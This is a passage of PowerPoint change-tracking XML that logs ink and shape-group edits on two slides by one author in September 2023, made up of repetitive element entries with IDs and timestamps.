          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="88" creationId="{42200195-4006-2D89-E440-532902D8F7D0}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="90" creationId="{B79C3791-93F4-BF40-796F-8C4837DC595C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="91" creationId="{0F1B9A57-D1AE-C26C-C8ED-6F9D2BBDB638}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="92" creationId="{8BCF9D1D-BA48-1903-4EE4-BC9907226327}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1491315966" sldId="278"/>
        </pc:sldMkLst>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="18" creationId="{A4CA1810-B36D-BDE4-011E-E6C14828293B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:34.951" v="4780"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="19" creationId="{AC9A07EB-516D-698D-0246-359B653172C7}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:17.784" v="4761"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="22" creationId="{4C433348-5EF1-A5C5-AE1D-DAF9195928E5}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:23.865" v="4771"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="29" creationId="{0868EA26-7D98-8548-FF6C-BB7875A67862}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:34.951" v="4780"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="39" creationId="{94F55429-E3C5-41A9-06CA-10FFAEF13CDF}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:36.733" v="4782"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="41" creationId="{E439F100-7B9C-BC7A-71FA-CBC1D0047ACE}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="43" creationId="{73140024-930B-96BB-8D47-311E8B0C4E83}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="48" creationId="{2D488E8D-D08D-B31E-4A67-3151B8C510AF}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:56.721" v="4792"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="53" creationId="{3C789311-D44A-29AF-F6DF-62EEF339471A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="54" creationId="{E00FB176-9D73-9EAD-84A6-B9828E304BF9}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="57" creationId="{37924C84-1C3D-F515-0B96-AE633C3DFE26}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="69" creationId="{B5D9DD24-AFA5-795C-3BBE-36F2E8AC8074}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="70" creationId="{B214229C-F394-C45E-8064-D3E380FA2D66}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="71" creationId="{908865EC-21B8-C3CA-EDC4-EA436C1831C5}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="2" creationId="{CBCD9156-A8A3-9E99-3FBF-F6E6CD28AC02}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="3" creationId="{80CCAA33-BCB3-FAAD-1920-14FD54F5D9E2}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="4" creationId="{1DD65087-0B1A-DBFA-55D8-B8D2366C749C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="5" creationId="{78ECAEC9-D2B2-117E-4162-BA217D09C34C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="6" creationId="{DCB39AE8-27A5-40E2-2B39-2D564C964025}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="7" creationId="{0B9C602C-B458-1E9E-E597-7F812F3E18FA}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="8" creationId="{CC93AFD5-F028-C7A9-44F9-51742392FD7B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="9" creationId="{4A2B2744-F8BB-B5DB-DF2B-6B36B7E1F87C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="10" creationId="{AA7AAC63-3CEF-D470-257D-5F8E9A65D0DB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="11" creationId="{C5826D04-29F8-7F08-81D3-9166A42DFD8C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="12" creationId="{F4DFF426-6EC2-5F41-74D3-E2B4067982C1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="13" creationId="{C1378D08-CE94-800A-C3AF-6714271CAC64}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="14" creationId="{B3DB1425-2C1A-1826-76ED-2DAAAA0B878C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="15" creationId="{0F38DCDA-9B6F-ACCC-83CC-C877E1CCE09A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="16" creationId="{533EC692-A65E-88D9-AB04-C4C60FD4DDFB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="17" creationId="{628D3124-6F88-940B-8F2C-AB6342729247}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="20" creationId="{424CE472-DF3A-E7C6-1AF0-E275D0A5AD09}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="21" creationId="{3F066882-881F-C7DA-1384-AD1C77E43045}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="23" creationId="{94839FFE-233F-C69D-8E26-1533DA2B52D3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="24" creationId="{63E76414-6495-E7D2-5542-FCEBE54900EE}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="25" creationId="{D2570140-CC77-03C5-332E-F00C2534DF4C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="26" creationId="{BC3D0BF8-FF16-DA8A-E384-302B3028B448}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="27" creationId="{99F755EF-C26E-8FB4-7537-809D65A2DBD6}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="28" creationId="{95C84BFB-990C-B8B0-FC53-F014EE966A01}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="30" creationId="{F323268A-1546-BA4A-1705-FED781479505}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="31" creationId="{41EEC3B2-3CC9-43C7-6F91-5A9D8C470A20}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="32" creationId="{EFF57559-F337-0A44-A7B8-04ED41999C8C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="33" creationId="{FC73FC2B-EA89-B4A2-17E2-E247B538D784}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="34" creationId="{99F3D92B-600E-698A-71AA-8C1C84AA926C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="35" creationId="{678793C7-CE5C-2CD6-1007-0CDBFE8420D5}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="36" creationId="{5B921ED6-3F02-2FC4-4CD6-8E904B669662}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="37" creationId="{AD8AE8E7-0BD8-2F37-6112-FC2693B47F87}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="38" creationId="{73234E3D-FBDF-7277-202E-4C5711A22E7A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="40" creationId="{A4EC17E1-5EBA-25DC-D80F-E7C2B1D1D562}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="42" creationId="{BAC94060-0AA2-206C-F142-62D8B0C9D7C8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="44" creationId="{4217B64E-DFCC-9DA1-6782-FBB1F51268E1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="45" creationId="{E7AA5C82-27EA-7B08-5C78-CE73A19A7538}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="46" creationId="{87FECB05-2432-2956-8120-3DFB5EB480B3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="47" creationId="{79C6FB8A-992B-6607-CFA7-4B450A04044B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
